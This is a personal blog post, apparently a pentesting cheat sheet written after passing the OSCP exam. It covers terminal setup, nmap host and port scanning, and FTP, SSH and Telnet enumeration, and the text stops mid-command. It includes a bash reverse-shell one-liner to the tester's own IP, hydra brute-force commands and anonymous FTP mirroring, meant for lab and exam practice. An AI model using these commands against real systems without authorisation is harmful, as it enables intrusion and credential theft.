My OSCP Pentesting Cheatsheet
I had my OSCP exam on 14.03.2025 and on 17 March, three days later, I already received the confirmation that I had passed the OSCP exam!
This is my compiled and comprehensive list of useful commands that I have documented in my personal knowledge base. In this blog post you will find useful tips and commands about network and service enumeration, password guessing, reverse shells, Active Directory and Windows post-exploitation that can be useful for penetration testing and the OSCP exam.
Some useful Tips
.env file
I created a separate directory for each machine that I hacked during my preparation and the OSCP exam. I then created an .env file in each of these directories and stored useful environment variables such as $TARGET_IP and $TARGET_DOMAIN in them:
export TARGET_IP="10.10.10.11"
export TARGET_DOMAIN="hackerask.com"
Then I could simply source the .env file whenever I wanted to work on this machine:
source .env
This is especially useful when you are working with multiple terminal tabs.
You can also use this file to store other environment variables that you use frequently, such as credentials, or to run scripts, for example to start a terminal logger.
$myip environment variable
I found it quite useful to have my IP address in a $myip environment variable. Since all the hacking lab platforms I use, such as HackTheBox, Proving Grounds or the challenge labs for my OSCP exam, use OpenVPN to get access to the machines, we can look at the tun0 network interface to see our local VPN IP address. We can look at it with ifconfig tun0 or ip addr show tun0.
To avoid having to type in the IP address every time I need it, I created a $myip environment variable that looks like this:
export myip=$(ip addr show tun0 2> /dev/null | grep 'inet ' | awk '{print $2}' | cut -d'/' -f1)
We can add the export line to our .bashrc or .zshrc and then source the file to be able to use the environment variable:
$ echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1"
/bin/bash -i >& /dev/tcp/192.168.178.10/5555 0>&1
This will output the reverse shell payload with our IP address of the tun0 network interface.
Copy Alias
I often have to copy the output of commands from the terminal to document them in my notes. Therefore I created an easy copy alias to pipe the output of a command into the clipboard.
I decided to use xclip, which can be installed with apt:
sudo apt install xclip
To create the alias, we can add the following line to the .bashrc or .zshrc file:
alias copy='xclip -selection clipboard'
Then restart the terminal session or source the file to be able to use it.
We can use the copy alias by appending it to a command with a pipe:
echo -n "/bin/bash -i >& /dev/tcp/$myip/5555 0>&1" | copy
This will pipe the output of the echo command, the reverse shell payload, to our clipboard.
Tmux
You should definitely learn and use tmux for the OSCP and for doing penetration tests/red team assignments. tmux is an excellent terminal multiplexer that allows you to manage multiple tabs and screens within a single window, making it easy to switch between them with simple keyboard shortcuts.
Tmux Cheat Sheet & Quick Reference
Network Enumeration
General
Host Discovery
nmap -sn 192.168.178.1-254 -vv -oA hosts
cat hosts.nmap | grep "report for" | grep -v "down" | cut -f5 -d ' '
If nmap does not work, we can also try to ping the hosts:
for i in $(seq 1 254); do ping "172.16.115.$i" -c 1 -W 0.1|grep "icmp_seq=1"|cut -f4 -d ' '|tr ':' ' '; done
Port Scanning
My first step is usually to scan the machine quickly with nmap for open TCP ports:
$ sudo nmap -p- -vvv $TARGET_IP -oN enum/nmap/quick-scan.txt
Then I can use the following command to get all ports comma separated as output:
$ cat enum/nmap/quick-scan.txt | grep '/tcp' | cut -f1 -d '/' | tr '\n' ',' | sed 's/\(.*\),/\1 /'
Then we can use the open ports to do a more detailed version scan:
# $PORTS holds the comma-separated list of open ports produced by the previous command
$ nmap -p $PORTS -sC -sV -oA enum/nmap/resource $TARGET_IP
After scanning the TCP ports, we should not forget to scan for UDP ports as well:
$ sudo nmap -Pn -n $TARGET_IP -sUV --top-ports=100 --reason -oA enum/nmap/resource-udp
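The quick-scan, port-extraction and version-scan steps above wrapped into shell functions, as an added example that is not code from the original post. It assumes $TARGET_IP is exported (for instance from the .env file) and that nmap is installed; the sample report at the bottom is constructed to exercise the parser offline, it is not real scan output.

```shell
#!/usr/bin/env bash
# Added example, not from the original cheat sheet.

# Turn an nmap -oN report into a comma-separated list of open TCP ports.
# Only lines like "22/tcp   open  ssh" count; closed or filtered ports are
# skipped, which the plain grep '/tcp' in the cheat sheet does not do.
open_ports_from_report() {
  grep -E '^[0-9]+/tcp[[:space:]]+open' "$1" | cut -d'/' -f1 | paste -s -d ',' -
}

# Full-range TCP scan first, then a script/version scan limited to the ports found.
# Usage: tcp_enum "$TARGET_IP" [output-dir]
tcp_enum() {
  local target="$1" outdir="${2:-enum/nmap}"
  mkdir -p "$outdir"
  sudo nmap -p- -vvv "$target" -oN "$outdir/quick-scan.txt"
  local ports
  ports=$(open_ports_from_report "$outdir/quick-scan.txt")
  if [ -z "$ports" ]; then
    echo "no open TCP ports found on $target" >&2
    return 1
  fi
  nmap -p "$ports" -sC -sV -oA "$outdir/resource" "$target"
}

# Constructed sample report (not real scan output) so the parser can be checked
# without touching the network. Writes the report to the path given as $1.
write_sample_report() {
  cat > "$1" <<'EOF'
# Nmap scan initiated as: nmap -p- -vvv -oN quick-scan.txt 10.10.10.11
Nmap scan report for 10.10.10.11
Host is up, received echo-reply ttl 63 (0.040s latency).
Not shown: 65531 closed tcp ports (reset)
PORT     STATE    SERVICE      REASON
21/tcp   open     ftp          syn-ack ttl 63
22/tcp   open     ssh          syn-ack ttl 63
80/tcp   open     http         syn-ack ttl 63
445/tcp  filtered microsoft-ds no-response
# Nmap done -- 1 IP address (1 host up) scanned in 12.34 seconds
EOF
}
```

Running open_ports_from_report on the sample report yields 21,22,80, which is the value tcp_enum passes to the second nmap run.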
TCP
21 - FTP
Anonymous Login:
ftp ftp://anonymous:anonymous@$TARGET_IP
Banner grabbing:
nc -vn $TARGET_IP 21
Download all files:
wget -m ftp://anonymous:anonymous@$TARGET_IP
wget -r --user="USERNAME" --password="PASSWORD" ftp://$TARGET_IP/
Bruteforce:
hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $TARGET_IP ftp
22 - SSH
Nmap:
# Check Authentication Methods:
nmap -p22 $TARGET_IP --script ssh-auth-methods --script-args="ssh.user=root"
# Retrieve Version
nmap -p22 $TARGET_IP -sV
Bruteforce:
hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt $TARGET_IP ssh
23 - Telnet
Banner Grabbing:
nc -vn $TARGET_IP 23
Nmap Enumeration:
nmap -n -sV -Pn --script...